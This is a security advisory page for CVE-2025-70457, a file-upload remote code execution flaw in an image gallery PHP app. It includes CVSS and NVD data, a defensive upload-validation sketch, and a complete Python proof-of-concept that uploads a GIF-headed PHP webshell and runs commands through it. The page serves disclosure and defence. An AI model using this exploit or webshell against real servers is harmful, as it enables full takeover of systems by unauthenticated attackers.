Security Vulnerability Report
CVE-2025-70457 CVSS 9.8 CRITICAL

CVE-2025-70457

Published: 2026-01-23 22:16:15
Last Modified: 2026-01-30 17:59:24

Description

A Remote Code Execution (RCE) vulnerability exists in Sourcecodester Modern Image Gallery App v1.0 within the gallery/upload.php component. The application fails to properly validate uploaded file contents. Additionally, the application preserves the user-supplied file extension during the save process. This allows an unauthenticated attacker to upload arbitrary PHP code by spoofing the MIME type as an image, leading to full system compromise.
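Added example, not code from the advisory or from the application: a server-side upload decision that closes the three gaps named in the description (unchecked content, a trusted client MIME type, a preserved client extension). The function names, the allow-list and the sample uploads are assumptions constructed for illustration.

```python
import os
import secrets

# Leading magic bytes for the image types this sketch allows (assumed allow-list).
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
}
ALIASES = {"jpeg": "jpg"}   # client extensions mapped to a canonical type
PHP_MARKER = b"<?php"       # heuristic only: short open tags are not covered


def sniff_type(data: bytes):
    """Return the image type implied by the file's leading bytes, or None."""
    for kind, prefixes in MAGIC.items():
        if data.startswith(prefixes):
            return kind
    return None


def decide_upload(client_name: str, client_mime: str, data: bytes):
    """Return (accepted, stored_name, reason). client_mime is deliberately
    ignored: it is attacker-controlled and is the value the advisory says
    was spoofed."""
    kind = sniff_type(data)
    if kind is None:
        return (False, None, "content is not a recognised image")
    ext = os.path.splitext(client_name)[1].lstrip(".").lower()
    ext = ALIASES.get(ext, ext)
    if ext != kind:
        return (False, None, f"extension '{ext}' does not match content type '{kind}'")
    if PHP_MARKER in data.lower():
        return (False, None, "PHP open tag found inside image data")
    # The stored name never reuses client input: random stem, extension from content.
    return (True, f"{secrets.token_hex(16)}.{kind}", "ok")


# Constructed samples (not captured traffic): the upload shape the advisory
# describes, a polyglot with an honest-looking name, and a benign GIF header.
SPOOFED = ("shell.php", "image/gif", b"GIF89a;\n<?php echo 1; ?>")
POLYGLOT = ("cat.gif", "image/gif", b"GIF89a;\n<?php echo 1; ?>")
BENIGN = ("cat.GIF", "image/gif", b"GIF89a\x01\x00\x01\x00\x00\x00\x00;")

if __name__ == "__main__":
    for sample in (SPOOFED, POLYGLOT, BENIGN):
        print(sample[0], "->", decide_upload(*sample))
```

A magic-byte check alone accepts a file that merely starts with a valid image header, which is why the extension is derived from the detected type and the stored name is server-generated. Content checks like this complement, and do not replace, serving the upload directory with script execution disabled.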

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:remyandrade:modern_image_gallery_app:1.0:*:*:*:*:*:*:* - VULNERABLE
Sourcecodester Modern Image Gallery App v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-70457 PoC - Sourcecodester Modern Image Gallery App RCE
Author: Security Researcher
Description: Upload malicious PHP file disguised as image to achieve RCE
"""

import requests
import sys

TARGET_URL = "http://target-site.com"  # Replace with target URL
UPLOAD_ENDPOINT = f"{TARGET_URL}/gallery/upload.php"
GALLERY_PATH = "/gallery/"


def create_malicious_file():
    """Create a PHP webshell with image header to bypass MIME check"""
    # GIF89a header to bypass MIME type validation
    image_header = b'GIF89a;\n'
    # PHP webshell for command execution
    php_payload = b'<?php system($_GET["cmd"]); ?>'
    return image_header + php_payload


def exploit_cve_2025_70457():
    """Exploit the file upload vulnerability to achieve RCE"""
    files = {
        'image': ('shell.php', create_malicious_file(), 'image/gif')
    }

    print("[*] CVE-2025-70457 Exploitation")
    print(f"[*] Target: {TARGET_URL}")
    print("[*] Uploading malicious PHP file...")

    try:
        response = requests.post(UPLOAD_ENDPOINT, files=files, timeout=10)
        if response.status_code == 200:
            # Attempt to access uploaded shell
            shell_url = f"{TARGET_URL}{GALLERY_PATH}shell.php"
            print(f"[+] File uploaded successfully!")
            print(f"[+] Webshell URL: {shell_url}")
            print(f"[*] Example command: {shell_url}?cmd=whoami")

            # Verify exploitation
            verify = requests.get(f"{shell_url}?cmd=echo+vulnerable", timeout=10)
            if 'vulnerable' in verify.text:
                print("[+] RCE Confirmed! Server is vulnerable.")
                return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
    return False


if __name__ == "__main__":
    exploit_cve_2025_70457()
```

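References

https://github.com/ismaildawoodjee/vulnerability-research/security/advisories/GHSA-8xq6-hjhw-4983 (Exploit, Third Party Advisory)
https://www.sourcecodester.com/php/18572/modern-image-gallery-app-using-php-and-mysql-source-code.html (Third Party Advisory)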

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-70457", "sourceIdentifier": "[email protected]", "published": "2026-01-23T22:16:15.243", "lastModified": "2026-01-30T17:59:24.497", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Remote Code Execution (RCE) vulnerability exists in Sourcecodester Modern Image Gallery App v1.0 within the gallery/upload.php component. The application fails to properly validate uploaded file contents. Additionally, the application preserves the user-supplied file extension during the save process. This allows an unauthenticated attacker to upload arbitrary PHP code by spoofing the MIME type as an image, leading to full system compromise."}, {"lang": "es", "value": "Una vulnerabilidad de ejecución remota de código (RCE) existe en Sourcecodester Modern Image Gallery App v1.0 dentro del componente gallery/upload.php. La aplicación no valida correctamente el contenido de los archivos subidos. Además, la aplicación conserva la extensión de archivo proporcionada por el usuario durante el proceso de guardado. 
Esto permite a un atacante no autenticado subir código PHP arbitrario suplantando el tipo MIME como una imagen, lo que lleva a un compromiso total del sistema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:remyandrade:modern_image_gallery_app:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "017F5B8E-C165-4C65-B0B9-F9A8B02E17E5"}]}]}], "references": [{"url": "https://github.com/ismaildawoodjee/vulnerability-research/security/advisories/GHSA-8xq6-hjhw-4983", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.sourcecodester.com/php/18572/modern-image-gallery-app-using-php-and-mysql-source-code.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}